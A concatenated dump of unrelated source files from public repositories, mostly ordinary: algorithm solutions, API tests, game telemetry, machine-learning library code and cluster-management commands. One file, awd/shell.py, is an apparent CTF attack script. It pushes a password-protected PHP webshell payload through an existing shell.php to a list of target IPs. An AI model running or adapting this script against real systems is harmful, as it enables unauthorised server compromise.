cfe8be1936ffb48572be726f0bcc6d06589a4f7f | 070b693744e7e73634c19b1ee5bc9e06f9fb852a | /python/problem-bit-manipulation/reverse_bits.py | db3e7500f8dee52f9f70c219edb95dbf38ef56fb | [] | no_license | rheehot/practice | a7a4ce177e8cb129192a60ba596745eec9a7d19e | aa0355d3879e61cf43a4333a6446f3d377ed5580 | refs/heads/master | 2021-04-15T22:04:34.484285 | 2020-03-20T17:20:00 | 2020-03-20T17:20:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 661 | py | # https://leetcode.com/problems/reverse-bits
# 33.75%
class Solution:
# @param n, an integer
# @return an integer
def reverseBits(self, n):
bits, bit = [], 0x1
for i in range(32):
print('bit {}, n & bit {}'.format(bit, n & bit))
if 0 == n & bit:
bits.append('0')
else:
bits.append('1')
bit <<= 1
print(bits)
return int(''.join(bits), 2)
s = Solution()
data = [(43261596, 964176192)]
for n, expected in data:
real = s.reverseBits(n)
print('{}, expected {}, real {}, result {}'.format(n, expected, real, expected == real))
| [
"morpheus.0@kakaocorp.com"
] | morpheus.0@kakaocorp.com |
a841c652172a7aa0a01324d759390454a36c21f2 | c7044393f89ffee67f30a277019372506d3b0af4 | /tests/integration/test_billpayment.py | c16f8a530034dc79212393f29a91faa2cace5663 | [
"MIT"
] | permissive | stephanelsmith/python-quickbooks | 66845f54aef86dc43a081dd49345a9c090642433 | 20fd4b6e92fe5a5e8dac43daefb0568f0465b62c | refs/heads/master | 2020-06-17T19:22:15.175039 | 2019-07-09T14:34:44 | 2019-07-09T14:34:44 | 196,022,916 | 0 | 0 | MIT | 2019-07-09T14:16:53 | 2019-07-09T14:16:52 | null | UTF-8 | Python | false | false | 2,408 | py | import os
import unittest
from datetime import datetime
from quickbooks.auth import Oauth1SessionManager
from quickbooks.client import QuickBooks
from quickbooks.objects.account import Account
from quickbooks.objects.bill import Bill
from quickbooks.objects.billpayment import BillPayment, BillPaymentLine, CheckPayment
from quickbooks.objects.vendor import Vendor
class BillPaymentTest(unittest.TestCase):
def setUp(self):
self.session_manager = Oauth1SessionManager(
sandbox=True,
consumer_key=os.environ.get('CONSUMER_KEY'),
consumer_secret=os.environ.get('CONSUMER_SECRET'),
access_token=os.environ.get('ACCESS_TOKEN'),
access_token_secret=os.environ.get('ACCESS_TOKEN_SECRET'),
)
self.qb_client = QuickBooks(
session_manager=self.session_manager,
sandbox=True,
company_id=os.environ.get('COMPANY_ID')
)
self.account_number = datetime.now().strftime('%d%H%M')
self.name = "Test Account {0}".format(self.account_number)
def test_create(self):
bill_payment = BillPayment()
bill_payment.PayType = "Check"
bill_payment.TotalAmt = 200
bill_payment.PrivateNote = "Private Note"
vendor = Vendor.all(max_results=1, qb=self.qb_client)[0]
bill_payment.VendorRef = vendor.to_ref()
bill_payment.CheckPayment = CheckPayment()
account = Account.where("AccountSubType = 'Checking'", qb=self.qb_client)[0]
bill_payment.CheckPayment.BankAccountRef = account.to_ref()
ap_account = Account.where("AccountSubType = 'AccountsPayable'", qb=self.qb_client)[0]
bill_payment.APAccountRef = ap_account.to_ref()
bill = Bill.all(max_results=1, qb=self.qb_client)[0]
line = BillPaymentLine()
line.LinkedTxn.append(bill.to_linked_txn())
line.Amount = 200
bill_payment.Line.append(line)
bill_payment.save(qb=self.qb_client)
query_bill_payment = BillPayment.get(bill_payment.Id, qb=self.qb_client)
self.assertEquals(query_bill_payment.PayType, "Check")
self.assertEquals(query_bill_payment.TotalAmt, 200.0)
self.assertEquals(query_bill_payment.PrivateNote, "Private Note")
self.assertEquals(len(query_bill_payment.Line), 1)
self.assertEquals(query_bill_payment.Line[0].Amount, 200.0)
| [
"edward.emanuel@gmail.com"
] | edward.emanuel@gmail.com |
b74b3f64c971504ff7beaf4a8b24756ffbbd7933 | a38180435ac5786185c0aa48891c0aed0ab9d72b | /S4/S4 Library/simulation/sims/university/university_telemetry.py | 3d65d5f99c17da1c0b69dc34bea11a7d0f241659 | [
"CC-BY-4.0"
] | permissive | NeonOcean/Environment | e190b6b09dd5dbecba0a38c497c01f84c6f9dc7d | ca658cf66e8fd6866c22a4a0136d415705b36d26 | refs/heads/master | 2022-12-03T13:17:00.100440 | 2021-01-09T23:26:55 | 2021-01-09T23:26:55 | 178,096,522 | 1 | 1 | CC-BY-4.0 | 2022-11-22T20:24:59 | 2019-03-28T00:38:17 | Python | UTF-8 | Python | false | false | 3,176 | py | import build_buy
import services
import sims4.telemetry
import telemetry_helper
TELEMETRY_GROUP_UNIVERSITY = 'UNIV'
TELEMETRY_HOOK_UNIVERSITY_HOUSING = 'UNHO'
TELEMETRY_HOOK_UNIVERSITY_ACCEPTANCE = 'UNAC'
TELEMETRY_HOOK_UNIVERSITY_ENROLL = 'UNEN'
TELEMETRY_HOOK_UNIVERSITY_TERM = 'UNTE'
TELEMETRY_HOOK_UNIVERSITY_COURSE = 'UNCO'
TELEMETRY_HOOK_UNIVERSITY_TUITION = 'UNTU'
TELEMETRY_FIELD_IS_ON_CAMPUS_HOUSING = 'ioch'
TELEMETRY_FIELD_SIM_AGE = 'sage'
TELEMETRY_FIELD_UNIVERSITY_MAJOR = 'umaj'
TELEMETRY_FIELD_TERM_GPA = 'tgpa'
TELEMETRY_FIELD_COURSE_ID = 'cour'
TELEMETRY_FIELD_COURSE_GRADE = 'grad'
TELEMETRY_FIELD_TUITION_COST = 'tcst'
TELEMETRY_FIELD_IS_USING_LOAN = 'iuln'
university_telemetry_writer = sims4.telemetry.TelemetryWriter(TELEMETRY_GROUP_UNIVERSITY)
logger = sims4.log.Logger('UniversityTelemetry', default_owner='mkartika')
class UniversityTelemetry:
@staticmethod
def send_university_housing_telemetry(zone_id):
if zone_id is None:
return
is_university_housing = False
if zone_id != 0:
venue_manager = services.get_instance_manager(sims4.resources.Types.VENUE)
venue = venue_manager.get(build_buy.get_current_venue(zone_id))
is_university_housing = venue.is_university_housing
with telemetry_helper.begin_hook(university_telemetry_writer, TELEMETRY_HOOK_UNIVERSITY_HOUSING) as hook:
hook.write_bool(TELEMETRY_FIELD_IS_ON_CAMPUS_HOUSING, is_university_housing)
@staticmethod
def send_acceptance_telemetry(sim_age):
with telemetry_helper.begin_hook(university_telemetry_writer, TELEMETRY_HOOK_UNIVERSITY_ACCEPTANCE) as hook:
hook.write_enum(TELEMETRY_FIELD_SIM_AGE, sim_age)
@staticmethod
def send_university_enroll_telemetry(sim_info, major):
with telemetry_helper.begin_hook(university_telemetry_writer, TELEMETRY_HOOK_UNIVERSITY_ENROLL, sim_info=sim_info) as hook:
hook.write_int(TELEMETRY_FIELD_UNIVERSITY_MAJOR, major.guid64)
@staticmethod
def send_university_term_telemetry(sim_info, major, gpa):
with telemetry_helper.begin_hook(university_telemetry_writer, TELEMETRY_HOOK_UNIVERSITY_TERM, sim_info=sim_info) as hook:
hook.write_int(TELEMETRY_FIELD_UNIVERSITY_MAJOR, major.guid64)
hook.write_float(TELEMETRY_FIELD_TERM_GPA, gpa)
@staticmethod
def send_university_course_telemetry(sim_info, major, course_data, grade):
with telemetry_helper.begin_hook(university_telemetry_writer, TELEMETRY_HOOK_UNIVERSITY_COURSE, sim_info=sim_info) as hook:
hook.write_int(TELEMETRY_FIELD_UNIVERSITY_MAJOR, major.guid64)
hook.write_int(TELEMETRY_FIELD_COURSE_ID, course_data.guid64)
hook.write_int(TELEMETRY_FIELD_COURSE_GRADE, grade)
@staticmethod
def send_university_tuition_telemetry(sim_info, tuition_cost, is_using_loan):
with telemetry_helper.begin_hook(university_telemetry_writer, TELEMETRY_HOOK_UNIVERSITY_TUITION, sim_info=sim_info) as hook:
hook.write_int(TELEMETRY_FIELD_TUITION_COST, tuition_cost)
hook.write_bool(TELEMETRY_FIELD_IS_USING_LOAN, is_using_loan)
| [
"40919586+NeonOcean@users.noreply.github.com"
] | 40919586+NeonOcean@users.noreply.github.com |
c92b9ff5f6511b9cfc629cace269b98af358d96a | 3f28b697f570ded0502de70c706200005ab62525 | /env/lib/python2.7/site-packages/sklearn/neighbors/kde.py | 8d940264f4374324ce9e5916eab9b797b0fd9d09 | [
"MIT"
] | permissive | Ram-Aditya/Healthcare-Data-Analytics | 5387e41ad8e56af474e10fa2d1c9d8a2847c5ead | d1a15d2cc067410f82a9ded25f7a782ef56b4729 | refs/heads/master | 2022-12-09T12:49:59.027010 | 2019-11-23T20:10:55 | 2019-11-23T20:10:55 | 223,639,339 | 0 | 1 | MIT | 2022-11-22T00:37:48 | 2019-11-23T19:06:20 | Jupyter Notebook | UTF-8 | Python | false | false | 7,925 | py | """
Kernel Density Estimation
-------------------------
"""
# Author: Jake Vanderplas <jakevdp@cs.washington.edu>
import numpy as np
from scipy.special import gammainc
from ..base import BaseEstimator
from ..utils import check_array, check_random_state
from ..utils.extmath import row_norms
from .ball_tree import BallTree, DTYPE
from .kd_tree import KDTree
VALID_KERNELS = ['gaussian', 'tophat', 'epanechnikov', 'exponential', 'linear',
'cosine']
TREE_DICT = {'ball_tree': BallTree, 'kd_tree': KDTree}
# TODO: implement a brute force version for testing purposes
# TODO: bandwidth estimation
# TODO: create a density estimation base class?
class KernelDensity(BaseEstimator):
"""Kernel Density Estimation
Parameters
----------
bandwidth : float
The bandwidth of the kernel.
algorithm : string
The tree algorithm to use. Valid options are
['kd_tree'|'ball_tree'|'auto']. Default is 'auto'.
kernel : string
The kernel to use. Valid kernels are
['gaussian'|'tophat'|'epanechnikov'|'exponential'|'linear'|'cosine']
Default is 'gaussian'.
metric : string
The distance metric to use. Note that not all metrics are
valid with all algorithms. Refer to the documentation of
:class:`BallTree` and :class:`KDTree` for a description of
available algorithms. Note that the normalization of the density
output is correct only for the Euclidean distance metric. Default
is 'euclidean'.
atol : float
The desired absolute tolerance of the result. A larger tolerance will
generally lead to faster execution. Default is 0.
rtol : float
The desired relative tolerance of the result. A larger tolerance will
generally lead to faster execution. Default is 1E-8.
breadth_first : boolean
If true (default), use a breadth-first approach to the problem.
Otherwise use a depth-first approach.
leaf_size : int
Specify the leaf size of the underlying tree. See :class:`BallTree`
or :class:`KDTree` for details. Default is 40.
metric_params : dict
Additional parameters to be passed to the tree for use with the
metric. For more information, see the documentation of
:class:`BallTree` or :class:`KDTree`.
"""
def __init__(self, bandwidth=1.0, algorithm='auto',
kernel='gaussian', metric="euclidean", atol=0, rtol=0,
breadth_first=True, leaf_size=40, metric_params=None):
self.algorithm = algorithm
self.bandwidth = bandwidth
self.kernel = kernel
self.metric = metric
self.atol = atol
self.rtol = rtol
self.breadth_first = breadth_first
self.leaf_size = leaf_size
self.metric_params = metric_params
# run the choose algorithm code so that exceptions will happen here
# we're using clone() in the GenerativeBayes classifier,
# so we can't do this kind of logic in __init__
self._choose_algorithm(self.algorithm, self.metric)
if bandwidth <= 0:
raise ValueError("bandwidth must be positive")
if kernel not in VALID_KERNELS:
raise ValueError("invalid kernel: '{0}'".format(kernel))
def _choose_algorithm(self, algorithm, metric):
# given the algorithm string + metric string, choose the optimal
# algorithm to compute the result.
if algorithm == 'auto':
# use KD Tree if possible
if metric in KDTree.valid_metrics:
return 'kd_tree'
elif metric in BallTree.valid_metrics:
return 'ball_tree'
else:
raise ValueError("invalid metric: '{0}'".format(metric))
elif algorithm in TREE_DICT:
if metric not in TREE_DICT[algorithm].valid_metrics:
raise ValueError("invalid metric for {0}: "
"'{1}'".format(TREE_DICT[algorithm],
metric))
return algorithm
else:
raise ValueError("invalid algorithm: '{0}'".format(algorithm))
def fit(self, X, y=None):
"""Fit the Kernel Density model on the data.
Parameters
----------
X : array_like, shape (n_samples, n_features)
List of n_features-dimensional data points. Each row
corresponds to a single data point.
"""
algorithm = self._choose_algorithm(self.algorithm, self.metric)
X = check_array(X, order='C', dtype=DTYPE)
kwargs = self.metric_params
if kwargs is None:
kwargs = {}
self.tree_ = TREE_DICT[algorithm](X, metric=self.metric,
leaf_size=self.leaf_size,
**kwargs)
return self
def score_samples(self, X):
"""Evaluate the density model on the data.
Parameters
----------
X : array_like, shape (n_samples, n_features)
An array of points to query. Last dimension should match dimension
of training data (n_features).
Returns
-------
density : ndarray, shape (n_samples,)
The array of log(density) evaluations.
"""
# The returned density is normalized to the number of points.
# For it to be a probability, we must scale it. For this reason
# we'll also scale atol.
X = check_array(X, order='C', dtype=DTYPE)
N = self.tree_.data.shape[0]
atol_N = self.atol * N
log_density = self.tree_.kernel_density(
X, h=self.bandwidth, kernel=self.kernel, atol=atol_N,
rtol=self.rtol, breadth_first=self.breadth_first, return_log=True)
log_density -= np.log(N)
return log_density
def score(self, X, y=None):
"""Compute the total log probability under the model.
Parameters
----------
X : array_like, shape (n_samples, n_features)
List of n_features-dimensional data points. Each row
corresponds to a single data point.
Returns
-------
logprob : float
Total log-likelihood of the data in X.
"""
return np.sum(self.score_samples(X))
def sample(self, n_samples=1, random_state=None):
"""Generate random samples from the model.
Currently, this is implemented only for gaussian and tophat kernels.
Parameters
----------
n_samples : int, optional
Number of samples to generate. Defaults to 1.
random_state : RandomState or an int seed (0 by default)
A random number generator instance.
Returns
-------
X : array_like, shape (n_samples, n_features)
List of samples.
"""
# TODO: implement sampling for other valid kernel shapes
if self.kernel not in ['gaussian', 'tophat']:
raise NotImplementedError()
data = np.asarray(self.tree_.data)
rng = check_random_state(random_state)
i = rng.randint(data.shape[0], size=n_samples)
if self.kernel == 'gaussian':
return np.atleast_2d(rng.normal(data[i], self.bandwidth))
elif self.kernel == 'tophat':
# we first draw points from a d-dimensional normal distribution,
# then use an incomplete gamma function to map them to a uniform
# d-dimensional tophat distribution.
dim = data.shape[1]
X = rng.normal(size=(n_samples, dim))
s_sq = row_norms(X, squared=True)
correction = (gammainc(0.5 * dim, 0.5 * s_sq) ** (1. / dim)
* self.bandwidth / np.sqrt(s_sq))
return data[i] + X * correction[:, np.newaxis]
| [
"ramaditya.danbrown@gmail.com"
] | ramaditya.danbrown@gmail.com |
3c66085bda3a774bb6434ae9fc4233056dbbd85b | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_2751486_0/Python/alexamici/A.py | 1cade536bfb429e80d1ec2be059a5be3fb11af7c | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 1,387 | py | """Usage:
pypy X.py < X-size.in > X-size.out
or sometimes
python X.py < X-size.in > X-size.out
"""
def setup(infile):
#C = {}
return locals()
def reader(testcase, infile, C=None, **ignore):
#N = int(infile.next())
#P = map(int, infile.next().split())
#I = map(int, infile.next().split())
T = infile.next().split()
#S = [infile.next().strip() for i in range(N)]
return locals()
def solver(testcase, N=None, P=None, I=None, T=None, S=None, C=None, **ignore):
#import collections as co
#import functools32 as ft
#import itertools as it
#import operator as op
#import math as ma
#import re
#import numpypy as np
#import scipy as sp
#import networkx as nx
name, n = T[0], int(T[1])
N = []
c = 0
for i, l in enumerate(name):
if l not in 'aeiou':
c += 1
if c >= n:
N.append(i)
else:
c = 0
res = 0
for i in range(len(name)):
for j in range(i+n-1, len(name)):
for k in range(i+n-1,j+1):
if k in N:
res += 1
break
return 'Case #%s: %s\n' % (testcase, res)
if __name__ == '__main__':
import sys
T = int(sys.stdin.next())
common = setup(sys.stdin)
for t in xrange(1, T+1):
sys.stdout.write(solver(**reader(t, **common)))
| [
"eewestman@gmail.com"
] | eewestman@gmail.com |
386d31faf6a46dfb07690904507a892a1c2708d7 | 43e0cfda9c2ac5be1123f50723a79da1dd56195f | /python/paddle/fluid/tests/unittests/test_eager_run_program.py | a04c544e9025732bcea5e8f43a232c46e494c447 | [
"Apache-2.0"
] | permissive | jiangjiajun/Paddle | 837f5a36e868a3c21006f5f7bb824055edae671f | 9b35f03572867bbca056da93698f36035106c1f3 | refs/heads/develop | 2022-08-23T11:12:04.503753 | 2022-08-11T14:40:07 | 2022-08-11T14:40:07 | 426,936,577 | 0 | 0 | Apache-2.0 | 2022-02-17T03:43:19 | 2021-11-11T09:09:28 | Python | UTF-8 | Python | false | false | 4,235 | py | # Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle
import numpy as np
from paddle import _C_ops
from paddle.fluid.framework import _test_eager_guard, Variable, _in_legacy_dygraph
from paddle.fluid import core
from paddle.fluid.layers.utils import _hash_with_id
import paddle.compat as cpt
import unittest
def _append_backward_desc(main_program, outs):
# make sure all status of is_test are False in train mode.
program = main_program.clone()
targets = []
for out in outs:
if isinstance(out, Variable):
targets.append(program.global_block().var(out.name))
if targets:
paddle.fluid.backward.gradients(targets=targets, inputs=[])
return program
# def _set_grad_type(params, train_program):
# # NOTE: if user set sparse gradient mode, the param's gradient
# # will be SelectedRows, not LoDTensor. But tracer will just
# # set param grad VarBase by forward VarBase(LoDTensor)
# # If we don't change grad_var type here, RunProgramOp need
# # transform SelectedRows to LoDTensor forcibly, it may not
# # be user wanted result.
# for param in params:
# grad_name = param.name + core.grad_var_suffix()
# grad_var = train_program.desc.block(0).find_var(
# cpt.to_bytes(grad_name))
# # NOTE: cannot find var desc maybe no problem, such as in batch_norm
# if grad_var is None:
# continue
# param._set_grad_type(grad_var.type())
def _create_out(var):
assert isinstance(var, Variable)
var_desc = var.desc
varbase = None
if _in_legacy_dygraph():
var_base = core.VarBase(var_desc.dtype(), var_desc.shape(),
var_desc.name(), var_desc.type(), False)
else:
var_base = core.eager.Tensor(var_desc.dtype(), var_desc.shape(),
var_desc.name(), var_desc.type(), False)
return var_base
class TestRunProgram(unittest.TestCase):
def test_eager(self):
paddle.set_device('cpu')
paddle.enable_static()
# step 1: construct program
x = paddle.static.data(shape=[2, 4], name='x')
x.stop_gradient = False
y = paddle.static.data(shape=[4, 2], name='y')
y.stop_gradient = False
out = paddle.matmul(x, y)
main_program = paddle.static.default_main_program()
program = _append_backward_desc(main_program, [out])
paddle.disable_static('cpu')
# step 2: call run_program in eager mode
with _test_eager_guard():
x_t = paddle.ones([2, 4])
x_t.name = "x"
x_t.stop_gradient = False
y_t = paddle.ones([4, 2])
y_t.name = "y"
y_t.stop_gradient = False
fake_var = paddle.zeros([1])
fake_var.name = 'Fake_var'
out_t = _create_out(out)
scope = core.Scope()
attrs = ('global_block', program.desc.block(0), 'start_op_index', 0,
'end_op_index', main_program.desc.block(0).op_size(),
'is_test', False, 'program_id', _hash_with_id(program))
_C_ops.run_program([x_t, y_t], [fake_var], [out_t], [scope],
[fake_var], None, *attrs)
loss = paddle.mean(out_t)
loss.backward()
np.testing.assert_array_equal(np.ones([2, 2]) * 4, out_t.numpy())
np.testing.assert_array_equal(
np.ones([2, 4]) * 0.5, x_t.grad.numpy())
np.testing.assert_array_equal(
np.ones([4, 2]) * 0.5, y_t.grad.numpy())
if __name__ == '__main__':
unittest.main()
| [
"noreply@github.com"
] | jiangjiajun.noreply@github.com |
bd7f8f43434bce3c16ea97db4e907dd0e2835440 | 0cc8dd3549d12e24fb4ceb007001676a4dc27130 | /awd/shell.py | b103d3dce3c86c0c33f1f195501d91b5786e3a19 | [] | no_license | virink/vFuckingTools | 78c98a2093deac438e173e0ef2d72cc8453f33bd | 71cafcf60b347d09ff5c62fb9d7a27daea85b5e2 | refs/heads/master | 2021-01-22T18:29:00.926553 | 2019-05-05T05:51:38 | 2019-05-05T05:51:38 | 85,087,381 | 14 | 6 | null | null | null | null | UTF-8 | Python | false | false | 1,357 | py | #!/usr/bin/env python
import requests
import random
ip_pass = {}
shell_pass = []
shell_address = '/WordPress/shell.php'
ips = ['40.10.10.57',
'40.10.10.26',
'40.10.10.11',
'40.10.10.62',
'40.10.10.24',
'40.10.10.59',
'40.10.10.47',
'40.10.10.42',
'40.10.10.15',
]
def get_shell(file):
return open(file).read()
def random_str(randomlength=6):
str = ''
chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789'
length = len(chars) - 1
for i in range(randomlength):
str += chars[random.randint(0, length)]
return str
def fuck(ip, password):
global filepath
# payload = % password
payload = get_shell('s4.php')
payload = payload.replace('passwordpassword', password).replace(
'<?php', '').replace('?>', '').replace('filepathfilepath', filepath)
try:
ip_pass[ip] = password
data = {'1': payload}
r = requests.post('http://' + ip + shell_address, data=data, timeout=3)
if r.status_code == '200':
print(ip + 'shell exist')
ip_pass[ip] = password
except requests.exceptions.ReadTimeout, e:
print('except : ' + e)
pass
if __name__ == '__main__':
filepath = ''
for ip in ips:
password = random_str()
fuck(ip, password)
| [
"virink@outlook.com"
] | virink@outlook.com |
9da2c36775a99673d80810536059cc0b7380e907 | b0885fde23fff880927c3a6248c7b5a33df670f1 | /models/im_retrieval_transformer/edit_encoder.py | 0e4567075df31d82bd11666f71d482f72c5f7c10 | [] | no_license | mrsalehi/paraphrase-generation | ceb68200e9016c5f26036af565fafa2d736dc96b | 3e8bd36bd9416999b93ed8e8529bfdf83cf4dcdd | refs/heads/master | 2020-07-22T03:50:40.343595 | 2019-08-26T11:29:08 | 2019-08-26T11:29:08 | 207,065,580 | 7 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,640 | py | import tensorflow as tf
from models.common import graph_utils, vocab
from models.common.config import Config
from models.im_all_transformer import edit_encoder
from models.im_all_transformer.edit_encoder import TransformerMicroEditExtractor, WordEmbeddingAccumulator
from models.im_all_transformer.transformer import model_utils
from models.im_all_transformer.transformer.embedding_layer import EmbeddingSharedWeights
OPS_NAME = 'edit_encoder'
class EditEncoderAcc(tf.layers.Layer):
def __init__(self, config, **kwargs):
super().__init__(config, **kwargs)
self.config = config
config.accumulated_dim = config.editor.edit_encoder.edit_dim // 2
self.wa = WordEmbeddingAccumulator(config)
# noinspection PyMethodOverriding
def call(self, src_word_ids, tgt_word_ids,
insert_word_ids, common_word_ids,
src_len, tgt_len, iw_len, cw_len, **kwargs):
with tf.variable_scope('edit_encoder'):
orig_embedding_layer = EmbeddingSharedWeights.get_from_graph()
wa_inserted = self.wa(orig_embedding_layer(insert_word_ids), iw_len)
wa_common = self.wa(orig_embedding_layer(common_word_ids), iw_len)
edit_vector = tf.concat([wa_inserted, wa_common], axis=1)
if self.config.editor.enable_dropout and self.config.editor.dropout > 0.:
edit_vector = tf.nn.dropout(edit_vector, 1. - self.config.editor.dropout)
return edit_vector, (tf.constant([[0.0]]), tf.constant([[0.0]]), tf.constant([[0.0]])), \
(tf.constant([[0.0]]), tf.constant([[0.0]]), tf.constant([[0.0]]))
| [
"ub.maka@gmail.com"
] | ub.maka@gmail.com |
6aaa0670890d94adae6318b188461250bd09151a | e601ff328271d102d6b38259129a588416279a3d | /Snek.py | 919628a5ef5b52837032d57a91758f83bef3c66f | [] | no_license | AlliterativeAnchovies/GameJamYamHam | 383c357adb2375cd7cf2f0cdd846e2824c4e69c1 | cba2c07098a7316d1b415c377151e8ba0902ecdf | refs/heads/master | 2021-05-07T01:27:46.474053 | 2017-11-13T16:55:29 | 2017-11-13T16:55:29 | 110,340,526 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 203 | py |
snekPosition = [0,0]
snekParts = []
def moveSnek(x, y):
snekPosition[0] += x
snekPosition[1] += y
def changeSnekSizeBy(count):
if count > 0:
pass
#snekParts.extend([pass for i in range(count)]) | [
"unconfigured@null.spigotmc.org"
] | unconfigured@null.spigotmc.org |
cb66fb20161657cdfa2e432eef049a08fc5795c3 | b169439ff77e4df4730b1efa09b3f306fbcd979f | /pyclownfish/clownfish_subsystem_service.py | 8f90b175b024d8dc03a87c36ffc03cc8bfe4b7fe | [
"MIT"
] | permissive | KnightKu/clownfish | 76d85030411d520ba3fcd301a796505cbfb863e7 | fb9209e99a22caa84e4ce8a7afa23dce46b0104c | refs/heads/master | 2022-07-28T21:41:40.351343 | 2020-02-16T14:47:08 | 2020-02-16T14:47:08 | 259,587,234 | 0 | 0 | null | 2020-04-28T09:11:14 | 2020-04-28T09:11:13 | null | UTF-8 | Python | false | false | 5,966 | py | # Copyright (c) 2020 DataDirect Networks, Inc.
# All Rights Reserved.
# Author: lixi@ddn.com
"""
Subsystem of service
"""
from pyclownfish import clownfish_command_common
from pylcommon import lustre
SUBSYSTEM_SERVICE_COMMNAD_MOVE = "move"
SUBSYSTEM_SERVICE_NAME = "service"
SUBSYSTEM_SERVICE = clownfish_command_common.Subsystem(SUBSYSTEM_SERVICE_NAME)
def service_move_usage(log):
"""
Usage of moving service
"""
log.cl_stdout("""Usage: %s %s <service_name> <hostname>
service_name: a Lustre service name, e.g. fsname-OST000a""" %
(SUBSYSTEM_SERVICE_NAME,
SUBSYSTEM_SERVICE_COMMNAD_MOVE))
def service_move(connection, args):
"""
move the service(s)
"""
# pylint: disable=too-many-branches
log = connection.cc_command_log
if ((clownfish_command_common.CLOWNFISH_OPTION_SHORT_HELP in args) or
(clownfish_command_common.CLOWNFISH_OPTION_LONG_HELP in args)):
service_move_usage(log)
return 0
instance = connection.cc_instance
if len(args) != 2:
service_move_usage(log)
return -1
service_name = args[0]
hostname = args[1]
service = instance.ci_name2service(service_name)
if service is None:
log.cl_error("invalid service name [%s]", service_name)
return -1
found = False
for host in service.ls_hosts():
if host.sh_hostname == hostname:
found = True
break
if not found:
log.cl_error("service [%s] doesn't have any instance on host [%s]",
service_name, hostname)
return -1
if service.ls_service_type == lustre.LUSTRE_SERVICE_TYPE_MGT:
ret = service.ls_mount(log, hostname=hostname)
else:
ret = service.ls_lustre_fs.lf_mount_service(log, service, hostname=hostname)
return ret
def service_move_argument(connection, complete_status):
"""
Return argument that can be filesystem's service
"""
instance = connection.cc_instance
line = complete_status.ccs_line
line_finished = line[0:complete_status.ccs_begidx]
fields = line_finished.split()
field_number = len(fields)
# fields[0] and fields[1] should be "service" and "move"
if field_number < 2:
return []
elif field_number == 2:
candidates = []
for lustrefs in instance.ci_lustres.values():
for service in lustrefs.lf_service_dict.itervalues():
if service.ls_service_name not in candidates:
candidates.append(service.ls_service_name)
for mgs in instance.ci_mgs_dict.values():
if mgs.ls_service_name not in candidates:
candidates.append(mgs.ls_service_name)
return candidates
elif field_number == 3:
service = instance.ci_name2service(fields[2])
if service is None:
return []
candidates = []
for host in service.ls_hosts():
candidates.append(host.sh_hostname)
return candidates
else:
return []
COMMAND = clownfish_command_common.ClownfishCommand(SUBSYSTEM_SERVICE_COMMNAD_MOVE, service_move)
COMMAND.cc_add_argument(service_move_argument)
SUBSYSTEM_SERVICE.ss_command_dict[SUBSYSTEM_SERVICE_COMMNAD_MOVE] = COMMAND
SUBSYSTEM_SERVICE_COMMNAD_UMOUNT = "umount"
def service_umount_usage(log):
"""
Usage of moving service
"""
log.cl_stdout("""Usage: %s %s <service_name>...
service_name: a Lustre service name, e.g. fsname-OST000a""" %
(SUBSYSTEM_SERVICE_NAME,
SUBSYSTEM_SERVICE_COMMNAD_UMOUNT))
def service_umount(connection, args):
"""
umount the service(s)
"""
# pylint: disable=too-many-branches
log = connection.cc_command_log
if ((clownfish_command_common.CLOWNFISH_OPTION_SHORT_HELP in args) or
(clownfish_command_common.CLOWNFISH_OPTION_LONG_HELP in args)):
service_umount_usage(log)
return 0
instance = connection.cc_instance
for service_name in args:
service = instance.ci_name2service(service_name)
if service is None:
log.cl_stderr("service name [%s] is not configured in Clownfish", service_name)
return -1
if service.ls_service_type == lustre.LUSTRE_SERVICE_TYPE_MGT:
ret = service.ls_umount(log)
else:
ret = service.ls_lustre_fs.lf_umount_service(log, service)
if ret:
return ret
return ret
def service_umount_argument(connection, complete_status):
"""
Return argument that can be filesystem's service
"""
instance = connection.cc_instance
line = complete_status.ccs_line
line_finished = line[0:complete_status.ccs_begidx]
fields = line_finished.split()
field_number = len(fields)
# fields[0] and fields[1] should be "service" and "umount"
if field_number < 2:
return []
elif field_number == 2:
candidates = []
for lustrefs in instance.ci_lustres.values():
for service in lustrefs.lf_service_dict.itervalues():
if service.ls_service_name not in candidates:
candidates.append(service.ls_service_name)
for mgs in instance.ci_mgs_dict.values():
if mgs.ls_service_name not in candidates:
candidates.append(mgs.ls_service_name)
return candidates
elif field_number == 3:
service = instance.ci_name2service(fields[2])
if service is None:
return []
candidates = []
for host in service.ls_hosts():
candidates.append(host.sh_hostname)
return candidates
else:
return []
COMMAND = clownfish_command_common.ClownfishCommand(SUBSYSTEM_SERVICE_COMMNAD_UMOUNT, service_umount)
COMMAND.cc_add_argument(service_umount_argument)
SUBSYSTEM_SERVICE.ss_command_dict[SUBSYSTEM_SERVICE_COMMNAD_UMOUNT] = COMMAND
| [
"lixi@ddn.com"
] | lixi@ddn.com |
2773b3c2eb933aa1def2296c9be9cc09597c93b0 | 369e260e100db9ab5cc8b1711e99ef5e49aec173 | /data/dacon/comp1/dacon1_8_feature_importances.py | 63fbb471f1ea288e16cd5ce5ffd2e0ab4d5872ed | [] | no_license | HWALIMLEE/study | 7aa4c22cb9d7f7838634d984df96eed75f7aefea | 8336adc8999126258fe328d6b985a48e32667852 | refs/heads/master | 2023-03-26T09:11:19.606085 | 2021-03-29T23:03:04 | 2021-03-29T23:03:04 | 259,555,730 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,666 | py | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
train=pd.read_csv('./data/dacon/comp1/train.csv',header=0,index_col=0) #0행이 header, 0열이 index/ header와 index모두 존재
